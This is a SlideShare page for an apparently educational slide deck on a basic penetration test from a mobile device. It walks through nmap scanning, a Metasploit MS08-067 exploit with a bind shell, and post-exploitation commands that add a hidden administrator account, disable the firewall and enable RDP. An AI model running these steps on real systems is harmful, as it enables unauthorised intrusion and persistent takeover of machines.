Fit 13 penetration test 1

588 views

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
588
On SlideShare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
12
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Fit 13 penetration test 1

  1. 1. {network security part 1} Penetration test sederhana dengan mobile device... http://www.flickr.com/photos/32615508@N02/3047982712
  2. 2. {network scan} Host discovery, find the targets
  3. 3. StumblerPlus , iWep PRO
  4. 4. iNet , Snap: Mobile version of pinger/scanner (ex: Angry IP Scanner)
  5. 5. {deeper profiling} Port scanning, OS detection etc.
  6. 6. Nmap 5.00 Jailbroken iPhone etc. $> nmap -O 192.168.5.44 Aha, microsoft-ds (port 445) plus XP SP2...
  7. 7. Or else... $> nmap -p 445 192.168.5.0/24
  8. 8. {penetrations} Using exploits etc.
  9. 9. Metasploit Framework $> msfconsole Easy, many modules, reular updates, Ruby, can run nmap too.
  10. 10. Use Proper Modules $> use windows/smb/ms08_067_netapi $> show options $> show payloads Security knowledge & deduction
  11. 11. Set Options $> set payload windows/shell_bind_tcp $> set rhost 192.168.5.44 $> exploit
  12. 12. Welcome to C: Prompt $> ipconfig $> dir $> net user $> net user guestboss guestboss /add $> net localgroup Administrators /add guestboss $> echo “P4wned!” > "c:Documents and SettingsguestbossDesktopHello.txt"
  13. 13. Shutdown Firewalll & Enable RDP $> set opmode mode = DISABLE exceptions = ENABLE $> reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f $> net localgroup "Remote Desktop Users" /add guestboss
  14. 14. {conclusions?} ..............................
  15. 15. Q&A

×